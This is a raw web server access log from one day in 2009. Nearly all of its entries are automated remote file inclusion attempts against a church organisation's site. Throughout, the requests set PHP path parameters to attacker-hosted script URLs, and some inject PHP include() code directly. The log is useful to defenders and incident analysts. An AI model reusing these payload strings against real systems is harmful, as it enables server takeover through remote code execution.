62.146.68.61 - - [31/May/2009:08:37:25 -0400] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 321
62.146.68.61 - - [31/May/2009:08:37:45 -0400] "GET /log/sdaglobal.org-access_log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 350
62.146.68.61 - - [31/May/2009:08:37:52 -0400] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 321
62.146.68.61 - - [31/May/2009:08:37:52 -0400] "GET /log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 325
62.146.68.61 - - [31/May/2009:08:37:52 -0400] "GET /log/sdaglobal.org-access_log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 350
62.146.68.61 - - [31/May/2009:08:38:26 -0400] "GET /log/sdaglobal.org-error_log.1/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 351
218.146.231.193 - - [31/May/2009:08:38:51 -0400] "GET /log/sdaglobal.org-access_log.1//modules/vwar/admin/admin.php?vwar_root=http://www.nw.or.kr/bbs/icon/bratid.txt?? HTTP/1.1" 404 341
218.146.231.193 - - [31/May/2009:08:38:53 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.nw.or.kr/bbs/icon/bratid.txt?? HTTP/1.1" 404 310
218.146.231.193 - - [31/May/2009:08:38:56 -0400] "GET /log//modules/vwar/admin/admin.php?vwar_root=http://www.nw.or.kr/bbs/icon/bratid.txt?? HTTP/1.1" 404 314
62.146.68.61 - - [31/May/2009:08:42:19 -0400] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://russianwomenabroad.com/poll/include/test.txt??? HTTP/1.1" 404 299
62.146.68.61 - - [31/May/2009:08:42:20 -0400] "GET /log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://russianwomenabroad.com/poll/include/test.txt??? HTTP/1.1" 404 303
121.0.141.241 - - [31/May/2009:08:52:41 -0400] "GET /log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 339
121.0.141.241 - - [31/May/2009:08:52:41 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 335
212.97.132.101 - - [31/May/2009:08:57:46 -0400] "GET /log/sdaglobal.org-access_log.3//agendax/addevent.inc.php?agendax_path=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.0" 404 337
212.97.132.101 - - [31/May/2009:08:57:46 -0400] "GET /log//agendax/addevent.inc.php?agendax_path=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.0" 404 310
212.97.132.101 - - [31/May/2009:08:57:46 -0400] "GET //agendax/addevent.inc.php?agendax_path=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.0" 404 306
74.208.111.178 - - [31/May/2009:08:58:52 -0400] "GET //login.php?dir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 291
74.208.111.178 - - [31/May/2009:08:58:52 -0400] "GET /log//login.php?dir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 295
74.208.111.178 - - [31/May/2009:08:58:54 -0400] "GET /log/sdaglobal.org-access_log//login.php?dir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 320
77.221.130.17 - - [31/May/2009:08:59:38 -0400] "GET //agendax/addevent.inc.php?agendax_path=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 306
77.221.130.17 - - [31/May/2009:08:59:40 -0400] "GET /log//agendax/addevent.inc.php?agendax_path=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 310
77.221.130.17 - - [31/May/2009:08:59:40 -0400] "GET /log/sdaglobal.org-access_log.3//agendax/addevent.inc.php?agendax_path=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 337
77.221.130.17 - - [31/May/2009:08:59:48 -0400] "GET /log//agendax/addevent.inc.php?agendax_path=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 310
77.221.130.17 - - [31/May/2009:08:59:48 -0400] "GET //agendax/addevent.inc.php?agendax_path=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 306
77.221.130.17 - - [31/May/2009:08:59:48 -0400] "GET /log/sdaglobal.org-access_log.3//agendax/addevent.inc.php?agendax_path=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 337
77.221.130.17 - - [31/May/2009:09:00:03 -0400] "GET /log/sdaglobal.org-access_log//agendax/addevent.inc.php?agendax_path=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 335
74.208.111.178 - - [31/May/2009:09:00:19 -0400] "GET /log/sdaglobal.org-access_log%20%20//login.php?dir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 322
77.221.130.17 - - [31/May/2009:09:00:31 -0400] "GET /log/sdaglobal.org-access_log//agendax/addevent.inc.php?agendax_path=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 335
69.50.197.106 - - [31/May/2009:09:01:08 -0400] "GET /log/sdaglobal.org-access_log//login.php?dir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 320
69.50.197.106 - - [31/May/2009:09:01:08 -0400] "GET //login.php?dir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 291
69.50.197.106 - - [31/May/2009:09:01:08 -0400] "GET /log//login.php?dir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 295
69.50.197.106 - - [31/May/2009:09:01:08 -0400] "GET /log//login.php?dir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 295
69.50.197.106 - - [31/May/2009:09:01:08 -0400] "GET //login.php?dir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 291
69.50.197.106 - - [31/May/2009:09:01:08 -0400] "GET /log/sdaglobal.org-access_log//login.php?dir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 320
121.0.141.241 - - [31/May/2009:09:01:17 -0400] "GET /log/sdaglobal.org-access_log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 364
69.50.197.106 - - [31/May/2009:09:01:24 -0400] "GET /log/sdaglobal.org-access_log%20%20//login.php?dir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 322
69.50.197.106 - - [31/May/2009:09:01:30 -0400] "GET /log/sdaglobal.org-access_log%20%20//login.php?dir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 322
121.165.73.157 - - [31/May/2009:09:06:28 -0400] "GET /log/sdaglobal.org-access_log%20%20//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 350
121.165.73.157 - - [31/May/2009:09:06:28 -0400] "GET /log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 323
121.165.73.157 - - [31/May/2009:09:06:29 -0400] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 319
121.165.73.157 - - [31/May/2009:09:06:29 -0400] "GET /log/sdaglobal.org-access_log%20%20//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 350
121.165.73.157 - - [31/May/2009:09:06:29 -0400] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 319
121.165.73.157 - - [31/May/2009:09:06:29 -0400] "GET /log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 323
211.203.180.144 - - [31/May/2009:09:07:20 -0400] "GET /log/sdaglobal.org-error_log.4/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 347
211.203.180.144 - - [31/May/2009:09:07:37 -0400] "GET /log/sdaglobal.org-error_log.4/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 347
217.147.29.190 - - [31/May/2009:09:08:39 -0400] "GET //include/admin.lib.inc.php?site_path=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 307
217.147.29.190 - - [31/May/2009:09:08:39 -0400] "GET /log//include/admin.lib.inc.php?site_path=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 311
217.147.29.190 - - [31/May/2009:09:08:42 -0400] "GET /log/sdaglobal.org-access_log%20%20//include/admin.lib.inc.php?site_path=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 338
207.44.232.81 - - [31/May/2009:09:09:14 -0400] "GET /log/sdaglobal.org-access_log%20%20//include/admin.lib.inc.php?site_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 338
207.44.232.81 - - [31/May/2009:09:09:16 -0400] "GET //include/admin.lib.inc.php?site_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 307
207.44.232.81 - - [31/May/2009:09:09:16 -0400] "GET /log//include/admin.lib.inc.php?site_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 311
216.15.161.2 - - [31/May/2009:09:09:56 -0400] "GET /protection.php?action=logout&siteurl=http://www.bikelister.com/test.txt?? HTTP/1.1" 404 295
216.15.161.2 - - [31/May/2009:09:09:56 -0400] "GET /log/protection.php?action=logout&siteurl=http://www.bikelister.com/test.txt?? HTTP/1.1" 404 299
211.203.180.144 - - [31/May/2009:09:10:14 -0400] "GET /log/sdaglobal.org-access_log.1%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 349
211.203.180.144 - - [31/May/2009:09:10:18 -0400] "GET /log/sdaglobal.org-access_log.1%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 349
112.175.141.41 - - [31/May/2009:09:11:05 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 349
121.165.73.157 - - [31/May/2009:09:11:25 -0400] "GET /log/sdaglobal.org-access_log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 348
217.147.29.190 - - [31/May/2009:09:11:28 -0400] "GET /log/sdaglobal.org-access_log.1//skin/zero_vote/error.php?dir=http://www.curling-erfurt.de/media/id.txt??? HTTP/1.1" 404 337
217.147.29.190 - - [31/May/2009:09:11:33 -0400] "GET //skin/zero_vote/error.php?dir=http://www.curling-erfurt.de/media/id.txt??? HTTP/1.1" 404 306
217.147.29.190 - - [31/May/2009:09:11:35 -0400] "GET /log//skin/zero_vote/error.php?dir=http://www.curling-erfurt.de/media/id.txt??? HTTP/1.1" 404 310
212.97.132.101 - - [31/May/2009:09:13:26 -0400] "GET /log/sdaglobal.org-access_log.1/SSI.php?sourcedir=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.0" 404 319
212.97.132.101 - - [31/May/2009:09:13:26 -0400] "GET /SSI.php?sourcedir=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.0" 404 288
212.97.132.101 - - [31/May/2009:09:13:26 -0400] "GET /log/SSI.php?sourcedir=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.0" 404 292
62.146.68.61 - - [31/May/2009:09:13:27 -0400] "GET /index.php?base=http://russianwomenabroad.com/poll/include/test.txt??? HTTP/1.1" 404 290
62.146.68.61 - - [31/May/2009:09:13:27 -0400] "GET /log/index.php?base=http://russianwomenabroad.com/poll/include/test.txt??? HTTP/1.1" 404 294
212.97.132.101 - - [31/May/2009:09:13:31 -0400] "GET /log/sdaglobal.org-access_log.3/SSI.php?sourcedir=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.0" 404 319
217.147.29.190 - - [31/May/2009:09:14:29 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 306
217.147.29.190 - - [31/May/2009:09:14:29 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 339
217.147.29.190 - - [31/May/2009:09:14:29 -0400] "GET /log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 310
77.221.130.17 - - [31/May/2009:09:14:32 -0400] "GET /SSI.php?sourcedir=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 288
77.221.130.17 - - [31/May/2009:09:14:33 -0400] "GET /log/sdaglobal.org-access_log.1/SSI.php?sourcedir=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 319
77.221.130.17 - - [31/May/2009:09:14:33 -0400] "GET /log/SSI.php?sourcedir=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 292
77.221.130.17 - - [31/May/2009:09:14:38 -0400] "GET /log/sdaglobal.org-access_log.4/SSI.php?sourcedir=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 319
217.147.29.190 - - [31/May/2009:09:14:42 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 339
77.221.130.17 - - [31/May/2009:09:15:22 -0400] "GET /SSI.php?sourcedir=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 288
77.221.130.17 - - [31/May/2009:09:15:22 -0400] "GET /log/sdaglobal.org-access_log.1/SSI.php?sourcedir=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 319
77.221.130.17 - - [31/May/2009:09:15:22 -0400] "GET /log/SSI.php?sourcedir=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 292
77.221.130.17 - - [31/May/2009:09:15:28 -0400] "GET /log/sdaglobal.org-access_log.4/SSI.php?sourcedir=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 319
217.147.29.190 - - [31/May/2009:09:16:17 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 306
217.147.29.190 - - [31/May/2009:09:16:17 -0400] "GET /log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 310
217.147.29.190 - - [31/May/2009:09:16:17 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 339
217.147.29.190 - - [31/May/2009:09:16:32 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 339
62.146.68.61 - - [31/May/2009:09:17:06 -0400] "GET //?_zb_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 200 9432
62.146.68.61 - - [31/May/2009:09:17:06 -0400] "GET /log/sdaglobal.org-access_log//?_zb_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 311
62.146.68.61 - - [31/May/2009:09:17:06 -0400] "GET /log/sdaglobal.org-access_log.4//?_zb_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 313
62.146.68.61 - - [31/May/2009:09:17:06 -0400] "GET /log//?_zb_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 200 58344
62.146.68.61 - - [31/May/2009:09:17:21 -0400] "GET //?_zb_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 200 9432
62.146.68.61 - - [31/May/2009:09:17:21 -0400] "GET /log/sdaglobal.org-access_log//?_zb_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 311
62.146.68.61 - - [31/May/2009:09:17:21 -0400] "GET /log/sdaglobal.org-access_log.4//?_zb_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 313
62.146.68.61 - - [31/May/2009:09:17:21 -0400] "GET /log//?_zb_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 200 58344
121.165.73.157 - - [31/May/2009:09:17:23 -0400] "GET /log/sdaglobal.org-access_log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 348
85.18.117.101 - - [31/May/2009:09:17:30 -0400] "GET //?_zb_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 200 9432
85.18.117.101 - - [31/May/2009:09:17:37 -0400] "GET /log/sdaglobal.org-access_log//?_zb_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 311
85.18.117.101 - - [31/May/2009:09:17:39 -0400] "GET /log//?_zb_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 200 58344
207.44.232.81 - - [31/May/2009:09:17:48 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 366
207.44.232.81 - - [31/May/2009:09:17:49 -0400] "GET /log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 337
207.44.232.81 - - [31/May/2009:09:17:49 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 333
207.44.232.81 - - [31/May/2009:09:18:23 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 366
216.17.99.13 - - [31/May/2009:09:20:12 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr/test.txt?? HTTP/1.1" 200 9432
216.17.99.13 - - [31/May/2009:09:20:12 -0400] "GET /log//?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr/test.txt?? HTTP/1.1" 200 58344
62.146.68.61 - - [31/May/2009:09:20:54 -0400] "GET //?_zb_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 200 9432
62.146.68.61 - - [31/May/2009:09:20:54 -0400] "GET /log/sdaglobal.org-access_log.4//?_zb_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 313
62.146.68.61 - - [31/May/2009:09:20:54 -0400] "GET /log//?_zb_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 200 58344
62.146.68.61 - - [31/May/2009:09:21:46 -0400] "GET /log/sdaglobal.org-access_log.1//?_zb_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 313
207.44.232.81 - - [31/May/2009:09:21:47 -0400] "GET /log/sdaglobal.org-access_log//include/admin.lib.inc.php?site_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 336
217.147.29.190 - - [31/May/2009:09:22:11 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 333
217.147.29.190 - - [31/May/2009:09:22:11 -0400] "GET /log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 337
217.147.29.190 - - [31/May/2009:09:22:11 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 366
62.146.68.61 - - [31/May/2009:09:22:34 -0400] "GET //?_zb_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 200 9432
62.146.68.61 - - [31/May/2009:09:22:34 -0400] "GET /log/sdaglobal.org-access_log.4//?_zb_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 313
62.146.68.61 - - [31/May/2009:09:22:34 -0400] "GET /log//?_zb_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 200 58344
217.147.29.190 - - [31/May/2009:09:22:40 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 366
69.94.125.100 - - [31/May/2009:09:22:42 -0400] "GET //skin/zero_vote/error.php?dir=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 306
69.94.125.100 - - [31/May/2009:09:22:42 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//skin/zero_vote/error.php?dir=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 339
69.94.125.100 - - [31/May/2009:09:22:42 -0400] "GET /log//skin/zero_vote/error.php?dir=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 310
69.94.125.100 - - [31/May/2009:09:23:18 -0400] "GET /log//skin/zero_vote/error.php?dir=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 310
69.94.125.100 - - [31/May/2009:09:23:18 -0400] "GET /log/sdaglobal.org-access_log.1//skin/zero_vote/error.php?dir=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 337
69.94.125.100 - - [31/May/2009:09:23:18 -0400] "GET //skin/zero_vote/error.php?dir=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 306
69.94.125.100 - - [31/May/2009:09:23:49 -0400] "GET /log/sdaglobal.org-access_log.4//skin/zero_vote/error.php?dir=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 337
69.94.125.100 - - [31/May/2009:09:24:24 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//skin/zero_vote/error.php?dir=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 339
112.175.141.41 - - [31/May/2009:09:25:17 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 349
217.147.29.190 - - [31/May/2009:09:27:51 -0400] "GET /log/sdaglobal.org-access_log.4//skin/zero_vote/error.php?dir=http://www.curling-erfurt.de/media/id.txt??? HTTP/1.1" 404 337
79.18.233.198 - - [31/May/2009:09:28:45 -0400] "GET /log/sdaglobal.org-access_log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 320
79.18.233.198 - - [31/May/2009:09:28:48 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 291
79.18.233.198 - - [31/May/2009:09:28:51 -0400] "GET /log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 295
74.6.18.227 - - [31/May/2009:09:30:18 -0400] "GET /robots.txt HTTP/1.0" 404 287
74.6.18.227 - - [31/May/2009:09:30:18 -0400] "GET / HTTP/1.0" 200 9432
72.30.79.32 - - [31/May/2009:09:31:57 -0400] "GET /log/twchurch.sdaglobal.org-access_log.1 HTTP/1.0" 200 18658
121.0.141.241 - - [31/May/2009:09:33:55 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//modules/xfsection/modify.php?dir_module=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 343
79.18.233.198 - - [31/May/2009:09:33:55 -0400] "GET /log/sdaglobal.org-access_log.1//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 322
121.0.141.241 - - [31/May/2009:09:33:58 -0400] "GET /log//modules/xfsection/modify.php?dir_module=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 314
121.0.141.241 - - [31/May/2009:09:33:58 -0400] "GET //modules/xfsection/modify.php?dir_module=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 310
85.18.117.101 - - [31/May/2009:09:34:08 -0400] "GET /log/sdaglobal.org-access_log%20%20//?_zb_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 313
79.18.233.198 - - [31/May/2009:09:36:10 -0400] "GET /log/sdaglobal.org-access_log.1//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 322
79.18.233.198 - - [31/May/2009:09:36:12 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 291
79.18.233.198 - - [31/May/2009:09:36:12 -0400] "GET /log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 295
85.18.117.101 - - [31/May/2009:09:37:23 -0400] "GET //?_zb_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 200 9432
85.18.117.101 - - [31/May/2009:09:37:23 -0400] "GET /log/sdaglobal.org-access_log%20%20//?_zb_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 313
85.18.117.101 - - [31/May/2009:09:37:23 -0400] "GET /log//?_zb_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 200 58344
209.200.8.89 - - [31/May/2009:09:37:41 -0400] "GET /log/sdaglobal.org-access_log//index.php?option=com_mambatstaff<emid=&mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 320
209.200.8.89 - - [31/May/2009:09:37:41 -0400] "GET //index.php?option=com_mambatstaff<emid=&mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 291
209.200.8.89 - - [31/May/2009:09:37:41 -0400] "GET /log//index.php?option=com_mambatstaff<emid=&mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 295
209.200.8.89 - - [31/May/2009:09:38:23 -0400] "GET /log//index.php?option=com_mambatstaff<emid=&mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 295
209.200.8.89 - - [31/May/2009:09:38:24 -0400] "GET //index.php?option=com_mambatstaff<emid=&mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 291
209.200.8.89 - - [31/May/2009:09:38:24 -0400] "GET /log/sdaglobal.org-access_log//index.php?option=com_mambatstaff<emid=&mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 320
69.94.125.100 - - [31/May/2009:09:38:51 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//modules/TotalCalendar/about.php?inc_dir=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 346
69.94.125.100 - - [31/May/2009:09:38:51 -0400] "GET /log//modules/TotalCalendar/about.php?inc_dir=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 317
69.94.125.100 - - [31/May/2009:09:38:51 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 313
217.147.29.190 - - [31/May/2009:09:38:55 -0400] "GET /errors.php?error=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 291
217.147.29.190 - - [31/May/2009:09:38:55 -0400] "GET /log/errors.php?error=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 295
217.147.29.190 - - [31/May/2009:09:38:58 -0400] "GET /log/sdaglobal.org-access_log.1%20%20/errors.php?error=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 324
